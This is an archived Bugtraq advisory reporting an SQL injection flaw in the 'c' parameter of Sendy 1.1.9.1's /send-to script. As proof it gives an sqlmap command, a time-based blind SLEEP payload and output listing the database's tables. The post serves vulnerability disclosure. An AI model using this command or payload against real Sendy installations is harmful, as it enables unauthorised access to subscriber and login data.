[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Sendy 1.1.9.1 - SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Sendy 1.1.9.1 - SQL Injection Vulnerability
From: marduk369@xxxxxxxxx
Date: Thu, 10 Apr 2014 14:06:50 GMT

Sendy contains a flaw that may allow carrying out an SQL injection attack. The 
issue is due to the /send-to script not properly sanitizing user-supplied input 
to the "c" parameter. This may allow a remote attacker to inject or manipulate 
SQL queries in the back-end database, allowing for the manipulation or 
disclosure of arbitrary data.

Proofs:

# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; 
PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
mutual consent is illegal. It is the end user's responsibility to obey all 
applicable local, state and federal laws. Developers assume no liability and 
are not responsible for any misuse or damage caused by this program

[*] starting at 11:48:57

[11:48:57] [INFO] resuming back-end DBMS 'mysql'
[11:48:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) 
requests:
---
Place: GET
Parameter: c
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=10 AND SLEEP(5)&i=1
---

[...]

Database: sendy
[9 tables]
+-------------+
| apps        |
| ares        |
| ares_emails |
| campaigns   |
| links       |
| lists       |
| login       |
| queue       |
| subscribers |
+-------------+

Prev by Date: [ MDVSA-2014:075 ] php
Next by Date: OWASP ZAP 2.3.0
Previous by thread: [ MDVSA-2014:075 ] php
Next by thread: OWASP ZAP 2.3.0
Index(es):
- Date
- Thread